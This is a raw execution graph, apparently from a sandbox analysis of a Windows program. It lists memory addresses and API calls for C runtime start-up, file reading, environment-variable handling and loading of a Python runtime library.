                                                                                                                                                                                                            execution_graph 99403 7ff7ace89620 99404 7ff7ace8964e 99403->99404 99405 7ff7ace89635 99403->99405 99405->99404 99408 7ff7ace9c9fc 99405->99408 99409 7ff7ace9ca47 99408->99409 99413 7ff7ace9ca0b _get_daylight 99408->99413 99416 7ff7ace94374 11 API calls _get_daylight 99409->99416 99411 7ff7ace9ca2e HeapAlloc 99412 7ff7ace896ac 99411->99412 99411->99413 99413->99409 99413->99411 99415 7ff7acea25e0 EnterCriticalSection LeaveCriticalSection _get_daylight 99413->99415 99415->99413 99416->99412 99417 7ff8a7ea8f80 99426 7ff8a7ea8c60 99417->99426 99420 7ff8a7ea8fe5 99424 7ff8a7ea8ffb 99420->99424 99425 7ff8a7ea8ff5 _Py_Dealloc 99420->99425 99421 7ff8a7ea8fab _PyObject_New 99422 7ff8a7ea8fc0 FreeLibrary 99421->99422 99423 7ff8a7ea8fcb _strdup 99421->99423 99422->99420 99423->99420 99425->99424 99427 7ff8a7ea8cb2 99426->99427 99428 7ff8a7ea8f0b _PyArg_ParseTuple_SizeT 99426->99428 99427->99428 99430 7ff8a7ea8cc3 99427->99430 99429 7ff8a7ea8f24 99428->99429 99432 7ff8a7ea8f06 99428->99432 99433 7ff8a7ea8f32 PyErr_SetString 99429->99433 99431 7ff8a7ea8e6f _PyArg_ParseTuple_SizeT 99430->99431 99441 7ff8a7ea8d17 _PyArg_ParseTuple_SizeT 99430->99441 99431->99432 99435 7ff8a7ea8e8f 99431->99435 99458 7ff8a7ebadc0 8 API calls 2 library calls 99432->99458 99433->99432 99437 7ff8a7ea8ec1 99435->99437 99438 7ff8a7ea8ea1 PyErr_Format 99435->99438 99436 7ff8a7ea8f57 99436->99420 99436->99421 99439 7ff8a7ea8ee3 PyUnicode_FromFormat PyUnicode_AsUTF8 99437->99439 99440 7ff8a7ea8eca PyErr_Format 99437->99440 99438->99432 99439->99432 99440->99432 99442 7ff8a7ea8d33 PyUnicode_AsUTF8 99441->99442 99443 7ff8a7ea8db0 PyErr_Clear _PyArg_ParseTuple_SizeT 99441->99443 99442->99432 99444 7ff8a7ea8d48 PyUnicode_GetSize 99442->99444 99443->99432 99445 7ff8a7ea8de5 PyUnicode_AsUTF8 99443->99445 99446 7ff8a7ea8d67 99444->99446 99447 7ff8a7ea8e05 99445->99447 99448 7ff8a7ea8dfa PyMem_Free 99445->99448 99451 7ff8a7ea8d7d PyUnicode_AsWideChar 99446->99451 99447->99433 99449 7ff8a7ea8e0e LoadLibraryA PyMem_Free 99447->99449 99448->99432 99450 7ff8a7ea8e21 99449->99450 99450->99432 99452 7ff8a7ea8e2a GetLastError 99450->99452 99451->99432 99453 7ff8a7ea8d9e LoadLibraryExW 99451->99453 99454 7ff8a7ea8e34 99452->99454 99455 7ff8a7ea8e4d PyErr_Format 99452->99455 99453->99450 99457 7ff8a7ea11a0 __stdio_common_vsprintf fprintf 99454->99457 99455->99432 99457->99455 99458->99436 99459 7ff8a7eb9890 99463 7ff8a7eb98c0 99459->99463 99460 7ff8a7eb98db PyUnicode_FromString 99461 7ff8a7eb98f0 PyDict_SetItemString 99460->99461 99462 7ff8a7eb9921 99460->99462 99461->99463 99464 7ff8a7eb9907 _Py_Dealloc 99461->99464 99463->99460 99463->99462 99464->99463 99465 7ff7ace9e80c 99466 7ff7ace9e9fe 99465->99466 99468 7ff7ace9e84e _isindst 99465->99468 99511 7ff7ace94374 11 API calls _get_daylight 99466->99511 99468->99466 99471 7ff7ace9e8ce _isindst 99468->99471 99486 7ff7acea52e4 99471->99486 99476 7ff7ace9ea2a 99521 7ff7ace99d00 IsProcessorFeaturePresent 99476->99521 99483 7ff7ace9e92b 99485 7ff7ace9e9ee 99483->99485 99510 7ff7acea5328 37 API calls _isindst 99483->99510 99512 7ff7ace8acd0 99485->99512 99487 7ff7acea52f3 99486->99487 99490 7ff7ace9e8ec 99486->99490 99525 7ff7ace9f6b8 EnterCriticalSection 99487->99525 99489 7ff7acea52fb 99489->99490 99491 7ff7acea5154 55 API calls 99489->99491 99492 7ff7acea46e8 99490->99492 99491->99490 99493 7ff7acea46f1 99492->99493 99494 7ff7ace9e901 99492->99494 99526 7ff7ace94374 11 API calls _get_daylight 99493->99526 99494->99476 99498 7ff7acea4718 99494->99498 99496 7ff7acea46f6 99527 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 99496->99527 99499 7ff7acea4721 99498->99499 99500 7ff7ace9e912 99498->99500 99528 7ff7ace94374 11 API calls _get_daylight 99499->99528 99500->99476 99504 7ff7acea4748 99500->99504 99502 7ff7acea4726 99529 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 99502->99529 99505 7ff7acea4751 99504->99505 99506 7ff7ace9e923 99504->99506 99530 7ff7ace94374 11 API calls _get_daylight 99505->99530 99506->99476 99506->99483 99508 7ff7acea4756 99531 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 99508->99531 99510->99485 99511->99485 99513 7ff7ace8acd9 99512->99513 99514 7ff7ace8ace4 99513->99514 99515 7ff7ace8b000 IsProcessorFeaturePresent 99513->99515 99516 7ff7ace8b018 99515->99516 99532 7ff7ace8b1f4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 99516->99532 99518 7ff7ace8b02b 99533 7ff7ace8afc4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99518->99533 99522 7ff7ace99d13 99521->99522 99534 7ff7ace99a14 14 API calls 2 library calls 99522->99534 99524 7ff7ace99d2e GetCurrentProcess TerminateProcess 99526->99496 99528->99502 99530->99508 99532->99518 99534->99524 99535 7ff7ace8ae3c 99556 7ff7ace8b2ac 99535->99556 99538 7ff7ace8af88 99652 7ff7ace8b5dc 7 API calls 2 library calls 99538->99652 99539 7ff7ace8ae58 __scrt_acquire_startup_lock 99541 7ff7ace8af92 99539->99541 99548 7ff7ace8ae76 __scrt_release_startup_lock 99539->99548 99653 7ff7ace8b5dc 7 API calls 2 library calls 99541->99653 99543 7ff7ace8ae9b 99544 7ff7ace8af9d __GetCurrentState 99545 7ff7ace8af21 99562 7ff7ace8b728 99545->99562 99547 7ff7ace8af26 99565 7ff7ace81000 99547->99565 99548->99543 99548->99545 99649 7ff7ace988b4 45 API calls 99548->99649 99553 7ff7ace8af49 99553->99544 99651 7ff7ace8b440 7 API calls __scrt_initialize_crt 99553->99651 99555 7ff7ace8af60 99555->99543 99654 7ff7ace8b8ac 99556->99654 99559 7ff7ace8b2db __scrt_initialize_crt 99560 7ff7ace8ae50 99559->99560 99656 7ff7ace8ca08 7 API calls 2 library calls 99559->99656 99560->99538 99560->99539 99657 7ff7ace8c150 99562->99657 99566 7ff7ace8100b 99565->99566 99659 7ff7ace87570 99566->99659 99568 7ff7ace8101d 99666 7ff7ace94e44 99568->99666 99570 7ff7ace8365b 99673 7ff7ace81af0 99570->99673 99573 7ff7ace8377a 99575 7ff7ace8acd0 _wfindfirst32i64 8 API calls 99573->99575 99576 7ff7ace8378e 99575->99576 99650 7ff7ace8b76c GetModuleHandleW 99576->99650 99577 7ff7ace83679 99577->99573 99689 7ff7ace83b00 99577->99689 99579 7ff7ace836ab 99579->99573 99692 7ff7ace86970 99579->99692 99581 7ff7ace836c7 99582 7ff7ace83713 99581->99582 99584 7ff7ace86970 61 API calls 99581->99584 99707 7ff7ace86f10 99582->99707 99588 7ff7ace836e8 __std_exception_copy 99584->99588 99585 7ff7ace83728 99711 7ff7ace819d0 99585->99711 99588->99582 99591 7ff7ace86f10 58 API calls 99588->99591 99589 7ff7ace83848 99598 7ff7ace8388b 99589->99598 99722 7ff7ace879a0 99589->99722 99590 7ff7ace819d0 121 API calls 99594 7ff7ace8375e 99590->99594 99591->99582 99596 7ff7ace83762 99594->99596 99597 7ff7ace837a0 99594->99597 99595 7ff7ace83868 99599 7ff7ace8387e SetDllDirectoryW 99595->99599 99600 7ff7ace8386d 99595->99600 99787 7ff7ace82770 59 API calls 2 library calls 99596->99787 99614 7ff7ace8381d 99597->99614 99788 7ff7ace83c90 99597->99788 99736 7ff7ace85e20 99598->99736 99599->99598 99813 7ff7ace82770 59 API calls 2 library calls 99600->99813 99607 7ff7ace838e6 99613 7ff7ace839a6 99607->99613 99616 7ff7ace838f9 99607->99616 99610 7ff7ace838a8 99610->99607 99815 7ff7ace85620 161 API calls 3 library calls 99610->99815 99611 7ff7ace837f0 99611->99614 99615 7ff7ace837f5 99611->99615 99777 7ff7ace830f0 99613->99777 99614->99589 99812 7ff7ace83260 59 API calls 99614->99812 99807 7ff7ace8f1dc 99615->99807 99629 7ff7ace83945 99616->99629 99819 7ff7ace81b30 99616->99819 99620 7ff7ace838b9 99623 7ff7ace838bd 99620->99623 99624 7ff7ace838dc 99620->99624 99621 7ff7ace839b3 99621->99573 99824 7ff7ace86ea0 57 API calls __std_exception_copy 99621->99824 99622 7ff7ace837c2 99811 7ff7ace82770 59 API calls 2 library calls 99622->99811 99816 7ff7ace855b0 91 API calls 99623->99816 99818 7ff7ace85870 FreeLibrary 99624->99818 99629->99573 99740 7ff7ace83090 99629->99740 99630 7ff7ace838c7 99630->99624 99632 7ff7ace838cb 99630->99632 99631 7ff7ace839db 99633 7ff7ace86970 61 API calls 99631->99633 99817 7ff7ace85c70 60 API calls 99632->99817 99636 7ff7ace839e7 99633->99636 99636->99573 99639 7ff7ace839f8 99636->99639 99637 7ff7ace83981 99823 7ff7ace85870 FreeLibrary 99637->99823 99638 7ff7ace838da 99638->99607 99825 7ff7ace86f50 63 API calls 2 library calls 99639->99825 99642 7ff7ace83a10 99826 7ff7ace85870 FreeLibrary 99642->99826 99644 7ff7ace83a37 99828 7ff7ace81ab0 74 API calls __std_exception_copy 99644->99828 99645 7ff7ace83a1c 99645->99644 99827 7ff7ace86c10 67 API calls 2 library calls 99645->99827 99648 7ff7ace83a3f 99648->99573 99649->99545 99650->99553 99651->99555 99652->99541 99653->99544 99655 7ff7ace8b2ce __scrt_dllmain_crt_thread_attach 99654->99655 99655->99559 99655->99560 99656->99560 99658 7ff7ace8b73f GetStartupInfoW 99657->99658 99658->99547 99661 7ff7ace8758f 99659->99661 99660 7ff7ace875e0 WideCharToMultiByte 99660->99661 99663 7ff7ace87688 99660->99663 99661->99660 99662 7ff7ace87636 WideCharToMultiByte 99661->99662 99661->99663 99665 7ff7ace87597 __std_exception_copy 99661->99665 99662->99661 99662->99663 99829 7ff7ace82620 57 API calls 2 library calls 99663->99829 99665->99568 99669 7ff7ace9eb70 99666->99669 99667 7ff7ace9ebc3 99830 7ff7ace99c14 37 API calls 2 library calls 99667->99830 99669->99667 99670 7ff7ace9ec16 99669->99670 99831 7ff7ace9ea48 71 API calls _fread_nolock 99670->99831 99672 7ff7ace9ebec 99672->99570 99674 7ff7ace81b05 99673->99674 99675 7ff7ace81b20 99674->99675 99832 7ff7ace824d0 59 API calls 3 library calls 99674->99832 99675->99573 99677 7ff7ace83b80 99675->99677 99833 7ff7ace8ad00 99677->99833 99680 7ff7ace83bbb 99835 7ff7ace82620 57 API calls 2 library calls 99680->99835 99681 7ff7ace83bd2 99836 7ff7ace87ab0 59 API calls 99681->99836 99684 7ff7ace83be5 99687 7ff7ace83bce 99684->99687 99837 7ff7ace82770 59 API calls 2 library calls 99684->99837 99686 7ff7ace8acd0 _wfindfirst32i64 8 API calls 99688 7ff7ace83c0f 99686->99688 99687->99686 99688->99577 99690 7ff7ace81b30 49 API calls 99689->99690 99691 7ff7ace83b1d 99690->99691 99691->99579 99693 7ff7ace8697a 99692->99693 99694 7ff7ace879a0 57 API calls 99693->99694 99695 7ff7ace8699c GetEnvironmentVariableW 99694->99695 99696 7ff7ace86a06 99695->99696 99697 7ff7ace869b4 ExpandEnvironmentStringsW 99695->99697 99698 7ff7ace8acd0 _wfindfirst32i64 8 API calls 99696->99698 99838 7ff7ace87ab0 59 API calls 99697->99838 99701 7ff7ace86a18 99698->99701 99700 7ff7ace869dc 99700->99696 99702 7ff7ace869e6 99700->99702 99701->99581 99839 7ff7ace9903c 37 API calls 2 library calls 99702->99839 99704 7ff7ace869ee 99705 7ff7ace8acd0 _wfindfirst32i64 8 API calls 99704->99705 99706 7ff7ace869fe 99705->99706 99706->99581 99708 7ff7ace879a0 57 API calls 99707->99708 99709 7ff7ace86f27 SetEnvironmentVariableW 99708->99709 99710 7ff7ace86f3f __std_exception_copy 99709->99710 99710->99585 99712 7ff7ace81b30 49 API calls 99711->99712 99713 7ff7ace81a00 99712->99713 99714 7ff7ace81b30 49 API calls 99713->99714 99721 7ff7ace81a7a 99713->99721 99715 7ff7ace81a22 99714->99715 99716 7ff7ace83b00 49 API calls 99715->99716 99715->99721 99717 7ff7ace81a3b 99716->99717 99840 7ff7ace817b0 99717->99840 99720 7ff7ace8f1dc 74 API calls 99720->99721 99721->99590 99721->99614 99723 7ff7ace87a47 MultiByteToWideChar 99722->99723 99724 7ff7ace879c1 MultiByteToWideChar 99722->99724 99726 7ff7ace87a6a 99723->99726 99727 7ff7ace87a8f 99723->99727 99725 7ff7ace879e7 99724->99725 99729 7ff7ace87a0c 99724->99729 99923 7ff7ace82620 57 API calls 2 library calls 99725->99923 99925 7ff7ace82620 57 API calls 2 library calls 99726->99925 99727->99595 99729->99723 99733 7ff7ace87a22 99729->99733 99731 7ff7ace87a7d 99731->99595 99732 7ff7ace879fa 99732->99595 99924 7ff7ace82620 57 API calls 2 library calls 99733->99924 99735 7ff7ace87a35 99735->99595 99737 7ff7ace85e35 99736->99737 99739 7ff7ace83890 99737->99739 99926 7ff7ace824d0 59 API calls 3 library calls 99737->99926 99739->99607 99814 7ff7ace85ac0 122 API calls 2 library calls 99739->99814 99927 7ff7ace84940 99740->99927 99743 7ff7ace830dd 99743->99637 99745 7ff7ace830b4 99745->99743 99983 7ff7ace846c0 99745->99983 99747 7ff7ace830c0 99747->99743 99993 7ff7ace84820 99747->99993 99749 7ff7ace830cc 99749->99743 99750 7ff7ace8331c 99749->99750 99751 7ff7ace83307 99749->99751 99753 7ff7ace8333c 99750->99753 99764 7ff7ace83352 __std_exception_copy 99750->99764 100024 7ff7ace82770 59 API calls 2 library calls 99751->100024 100025 7ff7ace82770 59 API calls 2 library calls 99753->100025 99754 7ff7ace8acd0 _wfindfirst32i64 8 API calls 99756 7ff7ace834aa 99754->99756 99756->99637 99759 7ff7ace81b30 49 API calls 99759->99764 99760 7ff7ace835eb 100033 7ff7ace82770 59 API calls 2 library calls 99760->100033 99762 7ff7ace835c5 100032 7ff7ace82770 59 API calls 2 library calls 99762->100032 99764->99759 99764->99760 99764->99762 99765 7ff7ace834b6 99764->99765 99776 7ff7ace83313 __std_exception_copy 99764->99776 99998 7ff7ace812b0 99764->99998 100026 7ff7ace81780 59 API calls 99764->100026 99766 7ff7ace83522 99765->99766 100027 7ff7ace9903c 37 API calls 2 library calls 99765->100027 100028 7ff7ace816d0 59 API calls 99766->100028 99769 7ff7ace83544 99770 7ff7ace83549 99769->99770 99771 7ff7ace83557 99769->99771 100029 7ff7ace9903c 37 API calls 2 library calls 99770->100029 100030 7ff7ace82de0 37 API calls 99771->100030 99774 7ff7ace83555 100031 7ff7ace823b0 62 API calls __std_exception_copy 99774->100031 99776->99754 99779 7ff7ace831a4 99777->99779 99784 7ff7ace83163 99777->99784 99778 7ff7ace831e3 99780 7ff7ace8acd0 _wfindfirst32i64 8 API calls 99778->99780 99779->99778 100204 7ff7ace81ab0 74 API calls __std_exception_copy 99779->100204 99782 7ff7ace831f5 99780->99782 99782->99621 99784->99779 100149 7ff7ace82990 99784->100149 100203 7ff7ace81440 161 API calls 2 library calls 99784->100203 100205 7ff7ace81780 59 API calls 99784->100205 99787->99573 99789 7ff7ace83c9c 99788->99789 99790 7ff7ace879a0 57 API calls 99789->99790 99791 7ff7ace83cc7 99790->99791 99792 7ff7ace879a0 57 API calls 99791->99792 99793 7ff7ace83cda 99792->99793 100354 7ff7ace953f8 99793->100354 99796 7ff7ace8acd0 _wfindfirst32i64 8 API calls 99797 7ff7ace837ba 99796->99797 99797->99622 99798 7ff7ace87170 99797->99798 99799 7ff7ace87194 99798->99799 99800 7ff7ace8f864 73 API calls 99799->99800 99805 7ff7ace8726b __std_exception_copy 99799->99805 99801 7ff7ace871ae 99800->99801 99801->99805 100520 7ff7ace97868 99801->100520 99803 7ff7ace8f864 73 API calls 99806 7ff7ace871c3 99803->99806 99804 7ff7ace8f52c _fread_nolock 53 API calls 99804->99806 99805->99611 99806->99803 99806->99804 99806->99805 99808 7ff7ace8f20c 99807->99808 100536 7ff7ace8efb8 99808->100536 99810 7ff7ace8f225 99810->99622 99811->99573 99812->99589 99813->99573 99814->99610 99815->99620 99816->99630 99817->99638 99818->99607 99820 7ff7ace81b55 99819->99820 99821 7ff7ace93b14 49 API calls 99820->99821 99822 7ff7ace81b78 99821->99822 99822->99629 99823->99573 99824->99631 99825->99642 99826->99645 99827->99644 99828->99648 99829->99665 99830->99672 99831->99672 99832->99675 99834 7ff7ace83b8c GetModuleFileNameW 99833->99834 99834->99680 99834->99681 99835->99687 99836->99684 99837->99687 99838->99700 99839->99704 99841 7ff7ace817d4 99840->99841 99842 7ff7ace817e4 99840->99842 99844 7ff7ace83c90 116 API calls 99841->99844 99843 7ff7ace87170 83 API calls 99842->99843 99846 7ff7ace81842 99842->99846 99845 7ff7ace81815 99843->99845 99844->99842 99845->99846 99874 7ff7ace8f864 99845->99874 99849 7ff7ace8acd0 _wfindfirst32i64 8 API calls 99846->99849 99848 7ff7ace8182b 99851 7ff7ace8184c 99848->99851 99852 7ff7ace8182f 99848->99852 99850 7ff7ace819c0 99849->99850 99850->99720 99850->99721 99878 7ff7ace8f52c 99851->99878 99887 7ff7ace824d0 59 API calls 3 library calls 99852->99887 99856 7ff7ace81867 99888 7ff7ace824d0 59 API calls 3 library calls 99856->99888 99857 7ff7ace8f864 73 API calls 99858 7ff7ace818d1 99857->99858 99860 7ff7ace818fe 99858->99860 99861 7ff7ace818e3 99858->99861 99863 7ff7ace8f52c _fread_nolock 53 API calls 99860->99863 99889 7ff7ace824d0 59 API calls 3 library calls 99861->99889 99864 7ff7ace81913 99863->99864 99864->99856 99865 7ff7ace81925 99864->99865 99881 7ff7ace8f2a0 99865->99881 99868 7ff7ace8193d 99890 7ff7ace82770 59 API calls 2 library calls 99868->99890 99870 7ff7ace81993 99870->99846 99872 7ff7ace8f1dc 74 API calls 99870->99872 99871 7ff7ace81950 99871->99870 99891 7ff7ace82770 59 API calls 2 library calls 99871->99891 99872->99846 99875 7ff7ace8f894 99874->99875 99892 7ff7ace8f5f4 99875->99892 99877 7ff7ace8f8ad 99877->99848 99905 7ff7ace8f54c 99878->99905 99882 7ff7ace8f2a9 99881->99882 99883 7ff7ace81939 99881->99883 99921 7ff7ace94374 11 API calls _get_daylight 99882->99921 99883->99868 99883->99871 99885 7ff7ace8f2ae 99922 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 99885->99922 99887->99846 99888->99846 99889->99846 99890->99846 99891->99870 99893 7ff7ace8f65e 99892->99893 99894 7ff7ace8f61e 99892->99894 99893->99894 99896 7ff7ace8f66a 99893->99896 99904 7ff7ace99c14 37 API calls 2 library calls 99894->99904 99903 7ff7ace9421c EnterCriticalSection 99896->99903 99897 7ff7ace8f645 99897->99877 99899 7ff7ace8f66f 99900 7ff7ace8f778 71 API calls 99899->99900 99901 7ff7ace8f681 99900->99901 99902 7ff7ace94228 _fread_nolock LeaveCriticalSection 99901->99902 99902->99897 99904->99897 99906 7ff7ace8f576 99905->99906 99907 7ff7ace81861 99905->99907 99906->99907 99908 7ff7ace8f5c2 99906->99908 99909 7ff7ace8f585 __scrt_get_show_window_mode 99906->99909 99907->99856 99907->99857 99918 7ff7ace9421c EnterCriticalSection 99908->99918 99919 7ff7ace94374 11 API calls _get_daylight 99909->99919 99912 7ff7ace8f5ca 99914 7ff7ace8f2cc _fread_nolock 51 API calls 99912->99914 99913 7ff7ace8f59a 99920 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 99913->99920 99916 7ff7ace8f5e1 99914->99916 99917 7ff7ace94228 _fread_nolock LeaveCriticalSection 99916->99917 99917->99907 99919->99913 99921->99885 99923->99732 99924->99735 99925->99731 99926->99739 99928 7ff7ace84950 99927->99928 99929 7ff7ace81b30 49 API calls 99928->99929 99930 7ff7ace84982 99929->99930 99931 7ff7ace849ab 99930->99931 99932 7ff7ace8498b 99930->99932 99934 7ff7ace84a02 99931->99934 100034 7ff7ace83d10 99931->100034 100047 7ff7ace82770 59 API calls 2 library calls 99932->100047 99936 7ff7ace83d10 49 API calls 99934->99936 99937 7ff7ace84a1b 99936->99937 99939 7ff7ace84a39 99937->99939 100049 7ff7ace82770 59 API calls 2 library calls 99937->100049 99938 7ff7ace849cc 99940 7ff7ace849ea 99938->99940 100048 7ff7ace82770 59 API calls 2 library calls 99938->100048 99943 7ff7ace87120 58 API calls 99939->99943 100037 7ff7ace83c20 99940->100037 99941 7ff7ace8acd0 _wfindfirst32i64 8 API calls 99946 7ff7ace8309e 99941->99946 99947 7ff7ace84a46 99943->99947 99946->99743 99955 7ff7ace84cc0 99946->99955 99949 7ff7ace84a6d 99947->99949 99950 7ff7ace84a4b 99947->99950 100051 7ff7ace83dd0 112 API calls 99949->100051 100050 7ff7ace82620 57 API calls 2 library calls 99950->100050 99954 7ff7ace849a1 99954->99941 99956 7ff7ace86970 61 API calls 99955->99956 99958 7ff7ace84cd5 99956->99958 99957 7ff7ace84cf0 99959 7ff7ace879a0 57 API calls 99957->99959 99958->99957 100079 7ff7ace82880 59 API calls 2 library calls 99958->100079 99961 7ff7ace84d34 99959->99961 99962 7ff7ace84d39 99961->99962 99963 7ff7ace84d50 99961->99963 100080 7ff7ace82770 59 API calls 2 library calls 99962->100080 99966 7ff7ace879a0 57 API calls 99963->99966 99965 7ff7ace84d45 99965->99745 99967 7ff7ace84d85 99966->99967 99969 7ff7ace81b30 49 API calls 99967->99969 99981 7ff7ace84d8a __std_exception_copy 99967->99981 99971 7ff7ace84e07 99969->99971 99970 7ff7ace84f31 99970->99745 99972 7ff7ace84e0e 99971->99972 99973 7ff7ace84e33 99971->99973 100081 7ff7ace82770 59 API calls 2 library calls 99972->100081 99975 7ff7ace879a0 57 API calls 99973->99975 99977 7ff7ace84e4c 99975->99977 99976 7ff7ace84e23 99976->99745 99977->99981 100052 7ff7ace84aa0 99977->100052 99982 7ff7ace84f1a 99981->99982 100083 7ff7ace82770 59 API calls 2 library calls 99981->100083 99982->99745 99984 7ff7ace846d7 99983->99984 99984->99984 99985 7ff7ace84700 99984->99985 99992 7ff7ace84717 __std_exception_copy 99984->99992 100099 7ff7ace82770 59 API calls 2 library calls 99985->100099 99987 7ff7ace8470c 99987->99747 99988 7ff7ace847fb 99988->99747 99989 7ff7ace812b0 122 API calls 99989->99992 99992->99988 99992->99989 100100 7ff7ace82770 59 API calls 2 library calls 99992->100100 100101 7ff7ace81780 59 API calls 99992->100101 99994 7ff7ace84927 99993->99994 99995 7ff7ace8483b 99993->99995 99994->99749 99995->99994 99995->99995 99997 7ff7ace82770 59 API calls 99995->99997 100102 7ff7ace81780 59 API calls 99995->100102 99997->99995 99999 7ff7ace812f8 99998->99999 100000 7ff7ace812c6 99998->100000 100002 7ff7ace8f864 73 API calls 99999->100002 100001 7ff7ace83c90 116 API calls 100000->100001 100003 7ff7ace812d6 100001->100003 100004 7ff7ace8130a 100002->100004 100003->99999 100005 7ff7ace812de 100003->100005 100006 7ff7ace8130e 100004->100006 100007 7ff7ace8132f 100004->100007 100121 7ff7ace82770 59 API calls 2 library calls 100005->100121 100122 7ff7ace824d0 59 API calls 3 library calls 100006->100122 100012 7ff7ace81364 100007->100012 100013 7ff7ace81344 100007->100013 100010 7ff7ace812ee 100010->99764 100011 7ff7ace81325 100011->99764 100015 7ff7ace8137e 100012->100015 100021 7ff7ace81395 100012->100021 100123 7ff7ace824d0 59 API calls 3 library calls 100013->100123 100103 7ff7ace81050 100015->100103 100017 7ff7ace8135f __std_exception_copy 100018 7ff7ace81421 100017->100018 100020 7ff7ace8f1dc 74 API calls 100017->100020 100018->99764 100019 7ff7ace8f52c _fread_nolock 53 API calls 100019->100021 100020->100018 100021->100017 100021->100019 100022 7ff7ace813de 100021->100022 100124 7ff7ace824d0 59 API calls 3 library calls 100022->100124 100024->99776 100025->99776 100026->99764 100027->99766 100028->99769 100029->99774 100030->99774 100031->99776 100032->99776 100033->99776 100035 7ff7ace81b30 49 API calls 100034->100035 100036 7ff7ace83d40 100035->100036 100036->99938 100038 7ff7ace83c2a 100037->100038 100039 7ff7ace879a0 57 API calls 100038->100039 100040 7ff7ace83c52 100039->100040 100041 7ff7ace8acd0 _wfindfirst32i64 8 API calls 100040->100041 100042 7ff7ace83c7a 100041->100042 100042->99934 100043 7ff7ace87120 100042->100043 100044 7ff7ace879a0 57 API calls 100043->100044 100045 7ff7ace87137 LoadLibraryExW 100044->100045 100046 7ff7ace87154 __std_exception_copy 100045->100046 100046->99934 100047->99954 100048->99940 100049->99939 100050->99954 100051->99954 100059 7ff7ace84aba 100052->100059 100053 7ff7ace8acd0 _wfindfirst32i64 8 API calls 100054 7ff7ace84c90 100053->100054 100082 7ff7ace87ba0 59 API calls __std_exception_copy 100054->100082 100057 7ff7ace84bd3 100065 7ff7ace84c71 100057->100065 100086 7ff7ace990b4 100057->100086 100059->100057 100061 7ff7ace84ca9 100059->100061 100059->100065 100084 7ff7ace95600 47 API calls 100059->100084 100085 7ff7ace81780 59 API calls 100059->100085 100096 7ff7ace82770 59 API calls 2 library calls 100061->100096 100064 7ff7ace84bf6 100066 7ff7ace990b4 _fread_nolock 37 API calls 100064->100066 100065->100053 100067 7ff7ace84c08 100066->100067 100093 7ff7ace9570c 39 API calls 3 library calls 100067->100093 100069 7ff7ace84c14 100094 7ff7ace95c94 73 API calls 100069->100094 100071 7ff7ace84c26 100095 7ff7ace95c94 73 API calls 100071->100095 100073 7ff7ace84c38 100074 7ff7ace94e44 71 API calls 100073->100074 100075 7ff7ace84c49 100074->100075 100076 7ff7ace94e44 71 API calls 100075->100076 100077 7ff7ace84c5d 100076->100077 100078 7ff7ace94e44 71 API calls 100077->100078 100078->100065 100079->99957 100080->99965 100081->99976 100082->99981 100083->99970 100084->100059 100085->100059 100087 7ff7ace990bd 100086->100087 100091 7ff7ace84bea 100086->100091 100097 7ff7ace94374 11 API calls _get_daylight 100087->100097 100089 7ff7ace990c2 100098 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100089->100098 100092 7ff7ace9570c 39 API calls 3 library calls 100091->100092 100092->100064 100093->100069 100094->100071 100095->100073 100096->100065 100097->100089 100099->99987 100100->99992 100101->99992 100102->99995 100104 7ff7ace810a6 100103->100104 100105 7ff7ace810ad 100104->100105 100106 7ff7ace810d3 100104->100106 100129 7ff7ace82770 59 API calls 2 library calls 100105->100129 100109 7ff7ace810ed 100106->100109 100110 7ff7ace81109 100106->100110 100108 7ff7ace810c0 100108->100017 100130 7ff7ace824d0 59 API calls 3 library calls 100109->100130 100112 7ff7ace8111b 100110->100112 100119 7ff7ace81137 memcpy_s 100110->100119 100131 7ff7ace824d0 59 API calls 3 library calls 100112->100131 100114 7ff7ace8f52c _fread_nolock 53 API calls 100114->100119 100115 7ff7ace81104 __std_exception_copy 100115->100017 100116 7ff7ace811fe 100132 7ff7ace82770 59 API calls 2 library calls 100116->100132 100119->100114 100119->100115 100119->100116 100120 7ff7ace8f2a0 37 API calls 100119->100120 100125 7ff7ace8fc6c 100119->100125 100120->100119 100121->100010 100122->100011 100123->100017 100124->100017 100126 7ff7ace8fc9c 100125->100126 100133 7ff7ace8f9bc 100126->100133 100128 7ff7ace8fcba 100128->100119 100129->100108 100130->100115 100131->100115 100132->100115 100134 7ff7ace8f9dc 100133->100134 100139 7ff7ace8fa09 100133->100139 100135 7ff7ace8fa11 100134->100135 100136 7ff7ace8f9e6 100134->100136 100134->100139 100140 7ff7ace8f8fc 100135->100140 100147 7ff7ace99c14 37 API calls 2 library calls 100136->100147 100139->100128 100148 7ff7ace9421c EnterCriticalSection 100140->100148 100142 7ff7ace8f919 100143 7ff7ace8f93c 74 API calls 100142->100143 100144 7ff7ace8f922 100143->100144 100145 7ff7ace94228 _fread_nolock LeaveCriticalSection 100144->100145 100146 7ff7ace8f92d 100145->100146 100146->100139 100147->100139 100150 7ff7ace829a6 100149->100150 100151 7ff7ace81b30 49 API calls 100150->100151 100153 7ff7ace829db 100151->100153 100152 7ff7ace82dc9 100153->100152 100154 7ff7ace83b00 49 API calls 100153->100154 100155 7ff7ace82a57 100154->100155 100206 7ff7ace82ff0 100155->100206 100158 7ff7ace82ae7 100214 7ff7ace86700 98 API calls 100158->100214 100159 7ff7ace82ff0 75 API calls 100161 7ff7ace82ae3 100159->100161 100161->100158 100163 7ff7ace82b55 100161->100163 100162 7ff7ace82aef 100164 7ff7ace82b0c 100162->100164 100215 7ff7ace865e0 134 API calls 2 library calls 100162->100215 100165 7ff7ace82ff0 75 API calls 100163->100165 100202 7ff7ace82b26 100164->100202 100216 7ff7ace82770 59 API calls 2 library calls 100164->100216 100167 7ff7ace82b7e 100165->100167 100169 7ff7ace82bd8 100167->100169 100170 7ff7ace82ff0 75 API calls 100167->100170 100169->100164 100217 7ff7ace86700 98 API calls 100169->100217 100172 7ff7ace82bab 100170->100172 100172->100169 100175 7ff7ace82ff0 75 API calls 100172->100175 100173 7ff7ace8acd0 _wfindfirst32i64 8 API calls 100174 7ff7ace82b4a 100173->100174 100174->99784 100175->100169 100176 7ff7ace81af0 59 API calls 100178 7ff7ace82c3f 100176->100178 100177 7ff7ace82be8 100177->100164 100177->100176 100179 7ff7ace82d06 100177->100179 100178->100164 100180 7ff7ace81b30 49 API calls 